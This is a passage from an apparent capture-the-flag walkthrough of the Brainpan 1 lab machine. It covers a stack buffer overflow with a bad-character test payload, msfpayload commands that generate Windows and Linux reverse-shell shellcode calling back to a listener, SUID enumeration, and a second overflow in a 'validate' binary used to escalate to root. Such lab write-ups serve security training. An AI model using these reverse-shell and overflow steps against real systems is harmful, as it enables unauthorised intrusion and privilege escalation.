Our temporary payload : "A"*524 + "B"*4 + (900-524-4-int(len(tail)))*"\x90"+tail, where
tail:
\xaa\xab\xac\xad\xae\xaf\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xba\xbb\xbc\xbd\xbe\xbf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xca\xcb\xcc\xcd\xce\xcf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xda\xdb\xdc\xdd\xde\xdf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xea\xeb\xec\xed\xee\xef\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xfa\xfb\xfc\xfd\xfe\xff\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\x0a\x0b\x0c\x0d\x0e\x0f\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x1a\x1b\x1c\x1d\x1e\x1f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x2a\x2b\x2c\x2d\x2e\x2f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x3a\x3b\x3c\x3d\x3e\x3f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x4a\x4b\x4c\x4d\x4e\x4f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x5a\x5b\x5c\x5d\x5e\x5f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x6a\x6b\x6c\x6d\x6e\x6f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x7a\x7b\x7c\x7d\x7e\x7f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x8a\x8b\x8c\x8d\x8e\x8f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x9b\x9c\x9d\x9e\x9f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99
The first of all we should remove from our payload \x00(null byte - break everything what is next) and \x90 (No Operation - do nothing)
Afer sending this part of payload, we can see in our Immunity Debugger that, everything is fine. Now, we generate out shell code
root@osboxes:~/brainpan1# msfpayload windows/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"
We have to replace tail to generated buf, run
root@osboxes:~/brainpan1# nc -nlvp 4444
 and execute our script










Nice! We should generate new payload for our Linux target machine.
root@osboxes:~/brainpan1# msfpayload linux/x86/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"
Execute our escript and BOOM!










We have got limited shell!
I verified and kernel of our target is not vulnerable to known exploit :-(, but look at some interesting
puck@brainpan:/$ find / -perm -4000 -type f

[...]

/usr/sbin/pppd
/usr/local/bin/validate
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
find: `/lost+found': Permission denied

[...]
OK, let's examine /usr/local/bin/validate.                                                                                                                                                                               















Have you though about Buffer Overflow again? Executing
sudo -l
We see that we don't have "extra" privileges.  I have downloaded validate file via netcat to our machine.








We can see that we haven't got any result for JMP ESP, but we have got two records for CALL EAX. OK! Then we have expectaton that validate is vulnerable to Buffer Overflow.






Excellent! We know 200 of A's cause overflow our binary!
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 200



 Amazing! We can determine "where" is EIP register.
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 39644138
[*] Exact match at offset 116
Our payload will look as in screenshot below
 Now we can generate shell code and replace with A's. Finally we are able to use our exploit and ... BOOM!










We have changed our privileges! TRY HARDER!
















Game over!